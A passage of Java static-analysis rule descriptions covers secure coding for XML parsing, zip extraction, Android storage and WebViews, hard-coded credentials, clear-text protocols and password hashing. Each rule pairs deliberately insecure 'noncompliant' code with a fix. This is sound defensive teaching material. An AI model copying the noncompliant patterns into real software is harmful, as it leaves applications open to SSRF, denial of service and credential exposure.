WebViews can be used to display web content as part of a mobile application. A browser engine is used to render and display the content. Like a web application, a mobile application that uses WebViews can be vulnerable to Cross-Site Scripting if untrusted code is rendered. In the context of a WebView, JavaScript code can exfiltrate local files that might be sensitive or even worse, access exposed functions of the application that can result in more severe vulnerabilities such as code injection. Thus JavaScript support should not be enabled for WebViews unless it is absolutely necessary and the authenticity of the web resources can be guaranteed.

Ask Yourself Whether

  • The WebWiew only renders static web content that does not require JavaScript code to be executed.
  • The WebView contains untrusted data that could cause harm when rendered.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to disable JavaScript support for WebViews unless it is necessary to execute JavaScript code. Only trusted pages should be rendered.

Sensitive Code Example

import android.webkit.WebView;

WebView webView = (WebView) findViewById(R.id.webview);
webView.getSettings().setJavaScriptEnabled(true); // Sensitive

Compliant Solution

import android.webkit.WebView;

WebView webView = (WebView) findViewById(R.id.webview);
webView.getSettings().setJavaScriptEnabled(false);

See

java:S6377

Why is this an issue?

XML signature validations work by parsing third-party data that cannot be trusted until it is actually validated.

As with any other parsing process, unrestricted validation of third-party XML signatures can lead to security vulnerabilities. In this case, threats range from denial of service to confidentiality breaches.

By default, the Java XML Digital Signature API does not apply restrictions on XML signature validation, unless the application runs with a security manager.
To protect the application from these vulnerabilities, set the org.jcp.xml.dsig.secureValidation attribute to true with the javax.xml.crypto.dsig.dom.DOMValidateContext.setProperty method.
This attribute ensures that the code enforces the following restrictions:

  • Forbids the use of XSLT transforms
  • Restricts the number of SignedInfo or Manifest Reference elements to 30 or less
  • Restricts the number of Reference transforms to 5 or less
  • Forbids the use of MD5-related signatures or MAC algorithms
  • Ensures that Reference IDs are unique to help prevent signature wrapping attacks
  • Forbids Reference URIs of type http, https, or file
  • Does not allow a RetrievalMethod element to reference another RetrievalMethod element
  • Forbids RSA or DSA keys less than 1024 bits

Noncompliant code example

NodeList signatureElement = doc.getElementsByTagNameNS(XMLSignature.XMLNS, "Signature");

XMLSignatureFactory fac = XMLSignatureFactory.getInstance("DOM");
DOMValidateContext valContext = new DOMValidateContext(new KeyValueKeySelector(), signatureElement.item(0)); // Noncompliant
XMLSignature signature = fac.unmarshalXMLSignature(valContext);

boolean signatureValidity = signature.validate(valContext);

Compliant solution

In order to benefit from this secure validation mode, set the DOMValidateContext’s org.jcp.xml.dsig.secureValidation property to TRUE.

NodeList signatureElement = doc.getElementsByTagNameNS(XMLSignature.XMLNS, "Signature");

XMLSignatureFactory fac = XMLSignatureFactory.getInstance("DOM");
DOMValidateContext valContext = new DOMValidateContext(new KeyValueKeySelector(), signatureElement.item(0));
valContext.setProperty("org.jcp.xml.dsig.secureValidation", Boolean.TRUE);
XMLSignature signature = fac.unmarshalXMLSignature(valContext);

boolean signatureValidity = signature.validate(valContext);

Resources

java:S6374

This rule is deprecated; use S2755 instead.

Why is this an issue?

By default XML processors attempt to load all XML schemas and DTD (their locations are defined with xsi:schemaLocation attributes and DOCTYPE declarations), potentially from an external storage such as file system or network, which may lead, if no restrictions are put in place, to server-side request forgery (SSRF) vulnerabilities.

Noncompliant code example

For DocumentBuilder, SAXParser and Schema JAPX factories:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setValidating(true); // Noncompliant
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", true); // Noncompliant

SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setValidating(true); // Noncompliant
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", true); // Noncompliant

SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
schemaFactory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", true); // Noncompliant

For Dom4j library:

SAXReader xmlReader = new SAXReader(); // Noncompliant
xmlReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", true);  // Noncompliant

For Jdom2 library:

SAXBuilder builder = new SAXBuilder();
builder.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", true); // Noncompliant

Compliant solution

For DocumentBuilder, SAXParser and Schema JAPX factories:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
schemaFactory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

For Dom4j library:

SAXReader xmlReader = new SAXReader(); // Noncompliant
xmlReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

For Jdom2 library:

SAXBuilder builder = new SAXBuilder();
builder.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

Exceptions

This rules does not raise an issue when an EntityResolver is set.

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setValidating(true);
DocumentBuilder builder = factory.newDocumentBuilder();
builder.setEntityResolver(new MyEntityResolver());

SAXBuilder builder = new SAXBuilder();
builder.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", true);
builder.setEntityResolver(new EntityResolver());

Resources

java:S6373

Why is this an issue?

XML standard allows the inclusion of xml files with the xinclude element.

XML processors will replace an xinclude element with the content of the file located at the URI defined in the href attribute, potentially from an external storage such as file system or network, which may lead, if no restrictions are put in place, to arbitrary file disclosures or server-side request forgery (SSRF) vulnerabilities.

Noncompliant code example

For DocumentBuilder, SAXParser, XMLInput, Transformer and Schema JAPX factories:

factory.setXIncludeAware(true); // Noncompliant
// or
factory.setFeature("http://apache.org/xml/features/xinclude", true); // Noncompliant

For Dom4j library:

SAXReader xmlReader = new SAXReader();
xmlReader.setFeature("http://apache.org/xml/features/xinclude", true); // Noncompliant

For Jdom2 library:

SAXBuilder builder = new SAXBuilder();
builder.setFeature("http://apache.org/xml/features/xinclude", true); // Noncompliant

Compliant solution

Xinclude is disabled by default and can be explicitely disabled like below.

For DocumentBuilder, SAXParser, XMLInput, Transformer and Schema JAPX factories:

factory.setXIncludeAware(false);
// or
factory.setFeature("http://apache.org/xml/features/xinclude", false);

For Dom4j library:

SAXReader xmlReader = new SAXReader();
xmlReader.setFeature("http://apache.org/xml/features/xinclude", false);

For Jdom2 library:

SAXBuilder builder = new SAXBuilder();
builder.setFeature("http://apache.org/xml/features/xinclude", false);

Exceptions

This rule does not raise issues when Xinclude is enabled with a custom EntityResolver:

For DocumentBuilderFactory:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setXIncludeAware(true);
// ...
DocumentBuilder builder = factory.newDocumentBuilder();
builder.setEntityResolver((publicId, systemId) -> new MySafeEntityResolver(publicId, systemId));

For SAXBuilder:

SAXBuilder builder = new SAXBuilder();
builder.setFeature("http://apache.org/xml/features/xinclude", true);
builder.setEntityResolver((publicId, systemId) -> new MySafeEntityResolver(publicId, systemId));

For SAXReader:

SAXReader xmlReader = new SAXReader();
xmlReader.setFeature("http://apache.org/xml/features/xinclude", true);
xmlReader.setEntityResolver((publicId, systemId) -> new MySafeEntityResolver(publicId, systemId));

For XMLInputFactory:

XMLInputFactory factory = XMLInputFactory.newInstance();
factory.setProperty("http://apache.org/xml/features/xinclude", true);
factory.setXMLResolver(new MySafeEntityResolver());

Resources

java:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data but turned into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers will compress irrelevant data (eg: a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the ratio between compressed and uncompressed data, in general the data compression ratio for most of the legit archives is 1 to 3.
  • Define and control the threshold for maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if their number is greater than a predefined threshold, in particular it’s not recommended to recursively expand archives (an entry of an archive could be also an archive).

Sensitive Code Example

File f = new File("ZipBomb.zip");
ZipFile zipFile = new ZipFile(f);
Enumeration<? extends ZipEntry> entries = zipFile.entries(); // Sensitive

while(entries.hasMoreElements()) {
  ZipEntry ze = entries.nextElement();
  File out = new File("./output_onlyfortesting.txt");
  Files.copy(zipFile.getInputStream(ze), out.toPath(), StandardCopyOption.REPLACE_EXISTING);
}

Compliant Solution

Do not rely on getsize to retrieve the size of an uncompressed entry because this method returns what is defined in the archive headers which can be forged by attackers, instead calculate the actual entry size when unzipping it:

File f = new File("ZipBomb.zip");
ZipFile zipFile = new ZipFile(f);
Enumeration<? extends ZipEntry> entries = zipFile.entries();

int THRESHOLD_ENTRIES = 10000;
int THRESHOLD_SIZE = 1000000000; // 1 GB
double THRESHOLD_RATIO = 10;
int totalSizeArchive = 0;
int totalEntryArchive = 0;

while(entries.hasMoreElements()) {
  ZipEntry ze = entries.nextElement();
  InputStream in = new BufferedInputStream(zipFile.getInputStream(ze));
  OutputStream out = new BufferedOutputStream(new FileOutputStream("./output_onlyfortesting.txt"));

  totalEntryArchive ++;

  int nBytes = -1;
  byte[] buffer = new byte[2048];
  int totalSizeEntry = 0;

  while((nBytes = in.read(buffer)) > 0) { // Compliant
      out.write(buffer, 0, nBytes);
      totalSizeEntry += nBytes;
      totalSizeArchive += nBytes;

      double compressionRatio = totalSizeEntry / ze.getCompressedSize();
      if(compressionRatio > THRESHOLD_RATIO) {
        // ratio between compressed and uncompressed data is highly suspicious, looks like a Zip Bomb Attack
        break;
      }
  }

  if(totalSizeArchive > THRESHOLD_SIZE) {
      // the uncompressed data size is too much for the application resource capacity
      break;
  }

  if(totalEntryArchive > THRESHOLD_ENTRIES) {
      // too much entries in this archive, can lead to inodes exhaustion of the system
      break;
  }
}

See

java:S6376

Why is this an issue?

An XML bomb / billion laughs attack is a malicious XML document containing the same large entity repeated over and over again. If no restrictions is in place, such a limit on the number of entity expansions, the XML processor can consume a lot memory and time during the parsing of such documents leading to Denial of Service.

Noncompliant code example

For DocumentBuilder, SAXParser and Schema and Transformer JAPX factories:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, false); // Noncompliant

SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, false); // Noncompliant

SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, false); // Noncompliant

TransformerFactory factory = javax.xml.transform.TransformerFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, false); // Noncompliant

For Dom4j library:

SAXReader xmlReader = new SAXReader();
xmlReader.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, false); // Noncompliant

For Jdom2 library:

SAXBuilder builder = new SAXBuilder();
builder.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, false);  // Noncompliant

Compliant solution

For DocumentBuilder, SAXParser and Schema and Transformer JAPX factories:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

TransformerFactory factory = javax.xml.transform.TransformerFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

For Dom4j library:

SAXReader xmlReader = new SAXReader();
xmlReader.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

For Jdom2 library:

SAXBuilder builder = new SAXBuilder();
builder.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

Resources

java:S1989

Why is this an issue?

Servlets are components in Java web development, responsible for processing HTTP requests and generating responses. In this context, exceptions are used to handle and manage unexpected errors or exceptional conditions that may occur during the execution of a servlet.

Catching exceptions within the servlet allows us to convert them into meaningful, user-friendly messages. Otherwise, failing to catch exceptions will propagate them to the servlet container, where the default error-handling mechanism may impact the overall security and stability of the server.

Possible security problems are:

  1. Vulnerability to denial-of-service attacks: Not caught exceptions can leave the servlet container in an unstable state, which can exhaust the available resources and make the system unavailable in the worst cases.
  2. Exposure of sensitive information: Exceptions handled by the servlet container, by default, expose detailed error messages or debugging information to the user, which may contain sensitive data such as stack traces, database connection, or system configuration.

Unfortunately, servlet method signatures do not force developers to handle IOException and ServletException:

public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
}

To prevent this risk, this rule enforces all exceptions to be caught within the "do*" methods of servlet classes.

How to fix it

Surround all method calls that may throw an exception with a try/catch block.

Code examples

In the following example, the getByName method may throw an UnknownHostException.

Noncompliant code example

public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
  InetAddress addr = InetAddress.getByName(request.getRemoteAddr()); // Noncompliant
  //...
}

Compliant solution

public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
  try {
    InetAddress addr = InetAddress.getByName(request.getRemoteAddr());
    //...
  }
  catch (UnknownHostException ex) {  // Compliant
    //...
  }
}

Resources

Articles & blog posts

java:S6288

Android KeyStore is a secure container for storing key materials, in particular it prevents key materials extraction, i.e. when the application process is compromised, the attacker cannot extract keys but may still be able to use them. It’s possible to enable an Android security feature, user authentication, to restrict usage of keys to only authenticated users. The lock screen has to be unlocked with defined credentials (pattern/PIN/password, biometric).

Ask Yourself Whether

  • The application requires prohibiting the use of keys in case of compromise of the application process.
  • The key material is used in the context of a highly sensitive application like a e-banking mobile app.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to enable user authentication (by setting setUserAuthenticationRequired to true during key generation) to use keys for a limited duration of time (by setting appropriate values to setUserAuthenticationValidityDurationSeconds), after which the user must re-authenticate.

Sensitive Code Example

Any user can use the key:

KeyGenerator keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, "AndroidKeyStore");

KeyGenParameterSpec builder = new KeyGenParameterSpec.Builder("test_secret_key_noncompliant", KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT) // Noncompliant
    .setBlockModes(KeyProperties.BLOCK_MODE_GCM)
    .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
    .build();

keyGenerator.init(builder);

Compliant Solution

The use of the key is limited to authenticated users (for a duration of time defined to 60 seconds):

KeyGenerator keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, "AndroidKeyStore");

KeyGenParameterSpec builder = new KeyGenParameterSpec.Builder("test_secret_key", KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)
    .setBlockModes(KeyProperties.BLOCK_MODE_GCM)
    .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
    .setUserAuthenticationRequired(true)
    .setUserAuthenticationParameters (60, KeyProperties.AUTH_DEVICE_CREDENTIAL)
    .build();

keyGenerator.init(builder)

See

java:S6291

Storing data locally is a common task for mobile applications. Such data includes preferences or authentication tokens for external services, among other things. There are many convenient solutions that allow storing data persistently, for example SQLiteDatabase, SharedPreferences, and Realm. By default these systems store the data unencrypted, thus an attacker with physical access to the device can read them out easily. Access to sensitive data can be harmful for the user of the application, for example when the device gets stolen.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to password-encrypt local databases that contain sensitive information. Most systems provide secure alternatives to plain-text storage that should be used. If no secure alternative is available the data can also be encrypted manually before it is stored.

The encryption password should not be hard-coded in the application. There are different approaches how the password can be provided to encrypt and decrypt the database. In the case of EncryptedSharedPreferences the Android Keystore can be used to store the password. Other databases can rely on EncryptedSharedPreferences to store passwords. The password can also be provided dynamically by the user of the application or it can be fetched from a remote server if the other methods are not feasible.

Sensitive Code Example

For SQLiteDatabase:

SQLiteDatabase db = activity.openOrCreateDatabase("test.db", Context.MODE_PRIVATE, null); // Sensitive

For SharedPreferences:

SharedPreferences pref = activity.getPreferences(Context.MODE_PRIVATE); // Sensitive

For Realm:

RealmConfiguration config = new RealmConfiguration.Builder().build();
Realm realm = Realm.getInstance(config); // Sensitive

Compliant Solution

Instead of SQLiteDatabase you can use SQLCipher:

SQLiteDatabase db = SQLiteDatabase.openOrCreateDatabase("test.db", getKey(), null);

Instead of SharedPreferences you can use EncryptedSharedPreferences:

String masterKeyAlias = new MasterKeys.getOrCreate(MasterKeys.AES256_GCM_SPEC);
EncryptedSharedPreferences.create(
    "secret",
    masterKeyAlias,
    context,
    EncryptedSharedPreferences.PrefKeyEncryptionScheme.AES256_SIV,
    EncryptedSharedPreferences.PrefValueEncryptionScheme.AES256_GCM
);

For Realm an encryption key can be specified in the config:

RealmConfiguration config = new RealmConfiguration.Builder()
    .encryptionKey(getKey())
    .build();
Realm realm = Realm.getInstance(config);

See

java:S6293

Android comes with Android KeyStore, a secure container for storing key materials. It’s possible to define certain keys to be unlocked when users authenticate using biometric credentials. This way, even if the application process is compromised, the attacker cannot access keys, as presence of the authorized user is required.

These keys can be used, to encrypt, sign or create a message authentication code (MAC) as proof that the authentication result has not been tampered with. This protection defeats the scenario where an attacker with physical access to the device would try to hook into the application process and call the onAuthenticationSucceeded method directly. Therefore he would be unable to extract the sensitive data or to perform the critical operations protected by the biometric authentication.

Ask Yourself Whether

The application contains:

  • Cryptographic keys / sensitive information that need to be protected using biometric authentication.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to tie the biometric authentication to a cryptographic operation by using a CryptoObject during authentication.

Sensitive Code Example

A CryptoObject is not used during authentication:

// ...
BiometricPrompt biometricPrompt = new BiometricPrompt(activity, executor, callback);
// ...
biometricPrompt.authenticate(promptInfo); // Noncompliant

Compliant Solution

A CryptoObject is used during authentication:

// ...
BiometricPrompt biometricPrompt = new BiometricPrompt(activity, executor, callback);
// ...
biometricPrompt.authenticate(promptInfo, new BiometricPrompt.CryptoObject(cipher)); // Compliant

See

java:S6301

Why is this an issue?

Storing data locally is a common task for mobile applications. There are many convenient solutions that allow storing data persistently, for example SQLiteDatabase and Realm. These systems can be initialized with a secret key in order to store the data encrypted.

The encryption key is meant to stay secret and should not be hard-coded in the application as it would mean that:

  • All user would use the same encryption key.
  • The encryption key would be known by anyone who as access to the source code or the application binary code.
  • Data stored encrypted in the database would not be protected.

There are different approaches how the key can be provided to encrypt and decrypt the database. One of the most convinient way to is to rely on EncryptedSharedPreferences to store encryption keys. It can also be provided dynamically by the user of the application or fetched from a remote server.

Noncompliant code example

SQLCipher

String key = "gb09ym9ydoolp3w886d0tciczj6ve9kszqd65u7d126040gwy86xqimjpuuc788g";
SQLiteDatabase db = SQLiteDatabase.openOrCreateDatabase("test.db", key, null); // Noncompliant

Realm

String key = "gb09ym9ydoolp3w886d0tciczj6ve9kszqd65u7d126040gwy86xqimjpuuc788g";
RealmConfiguration config = new RealmConfiguration.Builder();
    .encryptionKey(key.toByteArray()) // Noncompliant
    .build();
Realm realm = Realm.getInstance(config);

Compliant solution

SQLCipher

SQLiteDatabase db = SQLiteDatabase.openOrCreateDatabase("test.db", getKey(), null);

Realm

RealmConfiguration config = new RealmConfiguration.Builder()
    .encryptionKey(getKey())
    .build();
Realm realm = Realm.getInstance(config);

Resources

java:S2068

Because it is easy to extract strings from an application source code or binary, passwords should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Passwords should be stored outside of the code in a configuration file, a database, or a password management service.

This rule flags instances of hard-coded passwords used in database and LDAP connections. It looks for hard-coded passwords in connection strings, and for variable names that match any of the patterns from the provided list.

Ask Yourself Whether

  • The password allows access to a sensitive component like a database, a file storage, an API, or a service.
  • The password is used in production environments.
  • Application re-distribution is required before updating the password.

There would be a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

String username = "steve";
String password = "blue";
Connection conn = DriverManager.getConnection("jdbc:mysql://localhost/test?" +
                  "user=" + username + "&password=" + password); // Sensitive

Compliant Solution

String username = getEncryptedUser();
String password = getEncryptedPassword();
Connection conn = DriverManager.getConnection("jdbc:mysql://localhost/test?" +
                  "user=" + username + "&password=" + password);

See

java:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

These clients from Apache commons net libraries are based on unencrypted protocols and are not recommended:

TelnetClient telnet = new TelnetClient(); // Sensitive

FTPClient ftpClient = new FTPClient(); // Sensitive

SMTPClient smtpClient = new SMTPClient(); // Sensitive

Unencrypted HTTP connections, when using okhttp library for instance, should be avoided:

ConnectionSpec spec = new ConnectionSpec.Builder(ConnectionSpec.CLEARTEXT) // Sensitive
  .build();

Android WebView can be configured to allow a secure origin to load content from any other origin, even if that origin is insecure (mixed content):

import android.webkit.WebView

WebView webView = findViewById(R.id.webview)
webView.getSettings().setMixedContentMode(MIXED_CONTENT_ALWAYS_ALLOW); // Sensitive

Compliant Solution

Use instead these clients from Apache commons net and JSch/ssh library:

JSch jsch = new JSch();

if(implicit) {
  // implicit mode is considered deprecated but offer the same security than explicit mode
  FTPSClient ftpsClient = new FTPSClient(true);
}
else {
  FTPSClient ftpsClient = new FTPSClient();
}

if(implicit) {
  // implicit mode is considered deprecated but offer the same security than explicit mode
  SMTPSClient smtpsClient = new SMTPSClient(true);
}
else {
  SMTPSClient smtpsClient = new SMTPSClient();
  smtpsClient.connect("127.0.0.1", 25);
  if (smtpsClient.execTLS()) {
    // commands
  }
}

Perform HTTP encrypted connections, with okhttp library for instance:

ConnectionSpec spec = new ConnectionSpec.Builder(ConnectionSpec.MODERN_TLS)
  .build();

The most secure mode for Android WebView is MIXED_CONTENT_NEVER_ALLOW:

import android.webkit.WebView

WebView webView = findViewById(R.id.webview)
webView.getSettings().setMixedContentMode(MIXED_CONTENT_NEVER_ALLOW);

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

java:S6300

Storing files locally is a common task for mobile applications. Files that are stored unencrypted can be read out and modified by an attacker with physical access to the device. Access to sensitive data can be harmful for the user of the application, for example when the device gets stolen.

Ask Yourself Whether

  • The file contains sensitive data that could cause harm when leaked.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to password-encrypt local files that contain sensitive information. The class EncryptedFile can be used to easily encrypt files.

Sensitive Code Example

Files.write(path, content); // Sensitive

FileOutputStream out = new FileOutputStream(file); // Sensitive

FileWriter fw = new FileWriter("outfilename", false); // Sensitive

Compliant Solution

String masterKeyAlias = MasterKeys.getOrCreate(MasterKeys.AES256_GCM_SPEC);

File file = new File(context.getFilesDir(), "secret_data");
EncryptedFile encryptedFile = EncryptedFile.Builder(
    file,
    context,
    masterKeyAlias,
    EncryptedFile.FileEncryptionScheme.AES256_GCM_HKDF_4KB
).build();

// write to the encrypted file
FileOutputStream encryptedOutputStream = encryptedFile.openFileOutput();

See

java:S5693

Rejecting requests with significant content length is a good practice to control the network traffic intensity and thus resource consumption in order to prevents DoS attacks.

Ask Yourself Whether

  • size limits are not defined for the different resources of the web application.
  • the web application is not protected by rate limiting features.
  • the web application infrastructure has limited resources.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • For most of the features of an application, it is recommended to limit the size of requests to:
    • lower or equal to 8mb for file uploads.
    • lower or equal to 2mb for other requests.

It is recommended to customize the rule with the limit values that correspond to the web application.

Sensitive Code Example

With default limit value of 8388608 (8MB).

A 100 MB file is allowed to be uploaded:

@Bean(name = "multipartResolver")
public CommonsMultipartResolver multipartResolver() {
  CommonsMultipartResolver multipartResolver = new CommonsMultipartResolver();
  multipartResolver.setMaxUploadSize(104857600); // Sensitive (100MB)
  return multipartResolver;
}

@Bean(name = "multipartResolver")
public CommonsMultipartResolver multipartResolver() {
  CommonsMultipartResolver multipartResolver = new CommonsMultipartResolver(); // Sensitive, by default if maxUploadSize property is not defined, there is no limit and thus it's insecure
  return multipartResolver;
}

@Bean
public MultipartConfigElement multipartConfigElement() {
  MultipartConfigFactory factory = new MultipartConfigFactory(); // Sensitive, no limit by default
  return factory.createMultipartConfig();
}

Compliant Solution

File upload size is limited to 8 MB:

@Bean(name = "multipartResolver")
public CommonsMultipartResolver multipartResolver() {
  multipartResolver.setMaxUploadSize(8388608); // Compliant (8 MB)
  return multipartResolver;
}

See

java:S6437

Why is this an issue?

A hard-coded secret has been found in your code. You should quickly list where this secret is used, revoke it, and then change it in every system that uses it.

Passwords, secrets, and any type of credentials should only be used to authenticate a single entity (a person or a system).

If you allow third parties to authenticate as another system or person, they can impersonate legitimate identities and undermine trust within the organization.
It does not matter if the impersonation is malicious: In either case, it is a clear breach of trust in the system, as the systems involved falsely assume that the authenticated entity is who it claims to be.
The consequences can be catastrophic.

Keeping credentials in plain text in a code base is tantamount to sharing that password with anyone who has access to the source code and runtime servers.
Thus, it is a breach of trust, as these individuals have the ability to impersonate others.

Secret management services are the most efficient tools to store credentials and protect the identities associated with them.
Cloud providers and on-premise services can be used for this purpose.

If storing credentials in a secret data management service is not possible, follow these guidelines:

  • Do not store credentials in a file that an excessive number of people can access.
    • For example, not in code, not in a spreadsheet, not on a sticky note, and not on a shared drive.
  • Use the production operating system to protect password access control.
    • For example, in a file whose permissions are restricted and protected with chmod and chown.

Noncompliant code example

import org.h2.security.SHA256;

String inputString = "s3cr37";
byte[] key         = inputString.getBytes();

SHA256.getHMAC(key, message);  // Noncompliant

Compliant solution

Using AWS Secrets Manager:

import software.amazon.awssdk.services.secretsmanager.SecretsManagerClient;
import software.amazon.awssdk.services.secretsmanager.model.GetSecretValueRequest;
import software.amazon.awssdk.services.secretsmanager.model.GetSecretValueResponse;
import org.h2.security.SHA256;

public static void doSomething(SecretsManagerClient secretsClient, String secretName) {
  GetSecretValueRequest valueRequest = GetSecretValueRequest.builder()
    .secretId(secretName)
    .build();

  GetSecretValueResponse valueResponse = secretsClient.getSecretValue(valueRequest);
  String secret                        = valueResponse.secretString();

  byte[] key = secret.getBytes();
  SHA256.getHMAC(key, message);
}

Using Azure Key Vault Secret:

import com.azure.identity.DefaultAzureCredentialBuilder;
import com.azure.security.keyvault.secrets.SecretClient;
import com.azure.security.keyvault.secrets.SecretClientBuilder;
import com.azure.security.keyvault.secrets.models.KeyVaultSecret;
import org.h2.security.SHA256;

public static void doSomething(SecretClient secretClient, String secretName) {
  KeyVaultSecret retrievedSecret = secretClient.getSecret(secretName);
  String secret = retrievedSecret.getValue();

  byte[] key = secret.getBytes();
  SHA256.getHMAC(key, message);
}

Resources

java:S5344

Why is this an issue?

A user password should never be stored in clear-text, instead a hash should be produced from it using a secure algorithm:

  • not vulnerable to brute force attacks.
  • not vulnerable to collision attacks (see rule s4790).
  • and a salt should be added to the password to lower the risk of rainbow table attacks (see rule s2053).

This rule raises an issue when a password is stored in clear-text or with a hash algorithm vulnerable to bruce force attacks. These algorithms, like md5 or SHA-family functions are fast to compute the hash and therefore brute force attacks are possible (it’s easier to exhaust the entire space of all possible passwords) especially with hardware like GPU, FPGA or ASIC. Modern password hashing algorithms such as bcrypt, PBKDF2 or argon2 are recommended.

Noncompliant code example

@Autowired
public void configureGlobal(AuthenticationManagerBuilder auth, DataSource dataSource) throws Exception {
  auth.jdbcAuthentication()
    .dataSource(dataSource)
    .usersByUsernameQuery("SELECT * FROM users WHERE username = ?")
    .passwordEncoder(new StandardPasswordEncoder()); // Noncompliant

  // OR
  auth.jdbcAuthentication()
    .dataSource(dataSource)
